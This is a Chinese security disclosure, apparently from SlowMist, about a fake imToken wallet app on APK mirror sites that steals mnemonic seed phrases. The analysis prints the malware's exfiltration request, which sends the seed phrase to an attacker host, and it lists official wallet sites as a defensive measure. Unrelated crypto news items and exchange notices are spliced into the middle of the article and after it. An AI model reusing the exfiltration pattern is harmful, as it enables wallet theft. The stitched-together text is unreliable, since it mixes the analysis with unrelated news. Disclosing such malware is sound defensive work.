原文作者:?山&耀
技术的Web3正在驱动下一代技术革命,越来越多的人开始参与到这场加密浪潮中,但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林,身处Web3世界中,钱包则是进入Web3世界的入口以及通行证。
当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包“登录”;这与我们传统意义上的“登录”不同,在Web2世界中,每个应用之间的账户不全是互通的。但在Web3的世界中,所有应用都是统一使用钱包去进行“登录”,我们可以看到“登录”钱包时显示的不是“LoginwithWallet”,取而代之的是“ConnectWallet”。而钱包是你在Web3世界中的唯一通行证。
数据:0x67E4开头巨鲸地址今日已累计从OKX提币250万枚BLUR至链上:6月14日消息,据Lookonchain数据显示,0x67E4开头巨鲸地址于2小时前再次从OKX平台提币100万枚BLUR至链上,该巨鲸地址今日已累计从OKX提币250万枚BLUR,价值约合79.2万美元。[2023/6/14 21:37:01]
俗话说高楼之下必有阴影,在如此火热的Web3世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。
在Android环境下,由于很多手机不支持GooglePlay或者因为网络问题,很多人会从其他途径下载GooglePlay的应用,比如:apkcombo、apkpure等第三方下载站,这些站点往往标榜自己App是从GooglePlay镜像下载的,但是其真实安全性如何呢?
OKX与UniSat达成官方合作,共建BRC-20行业标准:5月12日,据官方消息,OKX与比特币铭文钱包UniSat Wallet达成官方合作,共建BRC-20行业标准。据悉,双方将基于OKX自研BRC-20账本解析与索引库,展开双重校验方面的合作,同时Unisat也将成为OKX Web3 BRC20市场数据供应商。此外,未来OKX将于与Unisat保持探索互换BRC20的订单流动性,持续共建BTC生态 。[2023/5/12 15:00:16]
据数据统计站点similarweb统计,apkcombo站点:
全球排名:?1,?809?
国家排名:?7,?370?
品类排名:?168?
我们可以看到它的影响力和流量都非常大。
欧易OKX联合帝国理工推出校园加密公开课:据官方推特显示,欧易OKX联合帝国理工推出首档《校园加密公开课》。
欧易OKX高管Lennix在演讲中表示:“欧易OKX致力于在加密货币领域建立一个以区块链为底层技术的元宇宙世界,这是一个令人兴奋、具有挑战性、持续性且不断发展的领域,OKX希望充满热情、好奇心的人加入,共同建设一个去中心化的未来,希望所有用户与OKX一同见证元宇宙的实现。”
据悉,此系列课程通过线上线下两种授课方式全面讲述区块链、比特币、DeFi、NFT等基础知识。该课程内容已于3月18日正式上线欧易OKX中文YouTube,用户可以在线学习全部课程。[2022/3/18 14:04:43]
它默认提供了一款chromeAPK下载插件,我们发现这款插件的用户数达到了10W:
OKX Ventures战略投资Zebec Protocol:据官方消息,OKX Ventures宣布战略投资基于Solana网络的连续且可编程的现金流协议Zebec Protocol。
对于此次合作,OKX Ventures创始人Dora表示:“我们很高兴成为 Zebec 的合作伙伴。Zebec已经为即时、无缝和连续的资金流构建了一个 DeFi 原生解决方案,Zebec 正在快速构建几乎每个 web3 公司都需要的资金管理、工资及支付的产品套件。”
据悉,Zebec 协议是 Solana 网络上的第一个可编程现金流协议,可实现工资、投资等方面的实时连续的支付及金融交易流。Zebec 协议实现的自动资金流,使企业、员工和消费者都能够重新想象他们的支付方式、投资方式以及购买产品或服务的方式。[2022/2/23 10:10:11]
那么回到我们关注的Web3领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?
我们拿知名的imToken钱包为例,其GooglePlay的正规下载途径为:
https://play.google.com/store/apps/details??id=im.token.app
由于很多手机不支持GooglePlay或者因为网络问题,很多人会从这里下载GooglePlay的应用。
而apkcombo镜像站的下载路径为:
https://apkcombo.com/downloader/#package=im.token.app
上图我们可以发现,apkcombo提供的版本为24.9.11?,经由imToken确认后,这是一个并不存在的版本!证实这是目前市面上假imToken钱包最多的一个版本。
在编写本文时imToken钱包的最新版本为2.11.3?,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。
如下图,我们在apkcombo上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的GooglePlay的下载量信息,安全起见,我们觉得有必要披露这个恶意App的来源,防止更多的人下载到此款假钱包。
同时我们发现类似的下载站还有如:uptodown
下载地址:https://imtoken.br.uptodown.com/android
我们发现uptodown任意注册即可发布App,这导致钓鱼的成本变得极低:
慢雾:假钱包App已致上万人被盗,损失高达十三亿美元》,所以在此不再赘述。
我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:
根据逆向APK代码和实际分析流量包发现,助记词发送方式:
https://api.funnel.rocks/api/trust??aid=?10&wt=?1&os=?1&key=<助记词>
看下图,最早的“api.funnel.rocks”证书出现在2022-06-03?,也就是攻击开始的大概时间:
俗话说一图胜千言,最后我们画一个流程图:
交易所时请认准官方下载渠道并从多方进行验证;如果你的钱包从上述镜像站下载,请第一时间转移资产并卸载该软件,必要时可通过官方验证通道核实。
同时,如需使用钱包,请务必认准以下主流钱包App官方网址:
1?/imToken钱包:https://token.im/
2?/TokenPocket钱包:https://www.tokenpocket.pro/
3?/TronLink钱包:https://www.tronlink.org/
4?/比特派钱包:https://bitpie.com/
5?/MetaMask钱包:https://metamask.io/
6?/TrustWallet:https://trustwallet.com/
请持续关注慢雾安全团队,更多Web3安全风险分析与告警正在路上。
致谢:感谢在溯源过程中imToken官方提供的验证支持。
由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。
金色财经报道,BittrexGlobal首席执行官Oliverlynch在接受采访时表示,美国证券交易委员会(SEC)指控加密货币交易所BittrexGlobalGmbH违反了当地证券法是“错误.
纽约联储更新的规则可能会认为稳定币发行人Circle“没有资格”进入美联储的货币市场。纽约联储针对希望使用其货币市场平衡器的交易对手发布了新规则,这给稳定币发行人Circle使用美联储系统的意图.
币圈是一个需要热度引领的市场,老叙事该炒的也差不多了,在没有新叙事出现的情况下,空投是唯一能让韭菜们兴奋的方式;不管如何,我们不能忽略的是大饼仍然是加密行业的头号资产.
親愛的ZT用戶: ZT創新板即將上線TOCKT,並開啟TOCKT/USDT交易對。具體上線時間如下:充值:已開啟;交易:2023年5月10日16:00(UTC8); TOCKT 項目簡介:TOC.
ShibaInu已成为著名的模因硬币。meme币也进入了市值前20名的加密货币列表。SHIB团队在开发方面一直非常一致.
这是一般性公告,此处提及的产品和服务可能不适用于您所在的地区。亲爱的用户:币安VIP借币平台新增INJ、HOT、RVN、MANA、TWT、GAL、REEF、PORTO、LRC、BEL、DENT、.